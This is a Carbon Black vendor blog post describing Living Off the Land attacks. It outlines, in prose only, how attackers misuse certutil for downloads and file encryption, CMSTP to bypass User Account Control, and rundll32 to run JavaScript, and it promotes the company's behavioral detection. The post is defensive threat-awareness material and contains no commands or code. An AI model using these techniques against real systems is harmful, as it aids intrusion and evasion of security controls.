How Carbon Black is Prioritizing Living Off the Land Attacks Part 2

Type carbonblack
Reporter Katie DeMatteis
Modified 2019-07-08T17:00:30


What are Living Off the Land (LoL) Attacks?

In recent years, Living off the Land Binaries and Scripts (LoLBas) have become increasingly popular tools for cybercriminals. These types of attacks leverage native, signed, and often pre-installed applications in malicious ways that their creators never intended. Exploiting trusted tools and applications makes it easier for attackers to remain undetected in systems—as these tools are preinstalled on the operating system and can be utilized to bypass security controls such as application whitelisting and traditional anti-virus—making LoL attacks extremely appealing to hackers.

Carbon Black + LoL Attacks

At Carbon Black, we understand the impact LoLbin based attack can have on a company—and we’re constantly working to ensure that your systems are protected. By staying up to date on the latest attack trends, we are able to improve our capabilities, allowing you to worry less and focus on what matters.

Recently, we published a blog on three LoL binaries attackers use for Initial Access, Execution and Defense Evasion.

In this blog post we will focus on a few different areas of the MITRE ATT&CK™ framework and discuss some techniques we see being used after an attacker has gained Initial Access to a system. In addition to the Defense Evasion and Execution tactics we covered in the last post, this post will also include Privilege Escalation, Command and Control, and Exfiltration:

  • Certutil Used as a Download Cradle or for File Obfuscation: Certutil—a native signed Windows application used to manage certificates on a system—is a LoL binary attackers leverage for multiple purposes. Once an attacker has access to a machine, they can leverage certutil to copy potentially malicious files onto the disk (T1105). After this, the attacker can use other native binaries—such as MSBuild which was covered in our previous blog post—to proxy the execution of their code (T1218). Furthermore, certutil has the ability to encrypt files, which attackers often do to obfuscate data prior to data exfiltration (T1022). This makes it harder for a defender to see what data is leaving the system. If certutil is handling or encrypting/decrypting any file types other than certificates, it is likely malicious behavior. Carbon Black’s behavioral detection abilities allow customers to be alerted when applications like certutil handle suspect files and perform actions that are not typical of that application’s normal behavior.
  • **CMSTP Leveraged as a User Account Control Bypass: After an attacker has gained initial access to a system and has delivered the files needed for the first stage of their attack, there are many methods they can use to escalate privileges and execute malicious activity. One such technique is to leverage applications that bypass Windows user account control (T1088) to gain elevated privileges without any user notification. Attackers have learned to proxy malicious binaries (T1218) through the Microsoft Connection Manager Profile Installer (CMSTP)—a native signed Windows application normally used to manage profiles for VPN connections—and run them with escalated privileges, leaving users unaware of the activity. The lack of user notification in this scenario makes it easier for these types of attacks to go undetected. _Carbon Black’s ability to spot malicious use cases of CMSTP keeps users aware of when attackers may be performing malicious activity with escalated privileges in their system.

_ * Rundll32 Executing Rogue JavaScript: Another application that attackers leverage to proxy arbitrary code execution is rundll32 (T1085)—a native application used to launch .dll files. A lesser-known functionality of rundll32 is its ability to execute JavaScript on the command line. Through either direct invocation or via another malicious file, attackers can call rundll32 to execute malicious JavaScript commands. This is not the intended purpose of the rundll32 application and, in most cases, is malicious in nature. Carbon Black has the ability to see when rundll32 is being used in this manner and will alert users to this potentially malicious behavior.

Carbon Black has developed an approach to detection and prevention that can help stop these and other types of attacks as they appear—whether they’ve been seen before or not. Our teams conduct behavioral threat research to discover novel behavioral patterns used by attackers. These patterns stretch across the entire scope of the kill chain, transcending any individual attack and allowing us to provide protection against a broad set of threats without relying on specific pre-discovered IOCs. With Carbon Black, you can rest easy knowing that you’re protected from the attacks we’ve highlighted and more.

For more details on LoL binaries and scripts check out the whitepaper written by Carbon Black’s Threat Analysis Unit (TAU).

Carbon Black’s managed alert triaging team, CB ThreatSight, recently investigated a series of ongoing PowerShell attacks leveraging several whitelisting bypasses and weaponized open source pentesting tools

Learn More

The post How Carbon Black is Prioritizing Living Off the Land Attacks Part 2 appeared first on Carbon Black.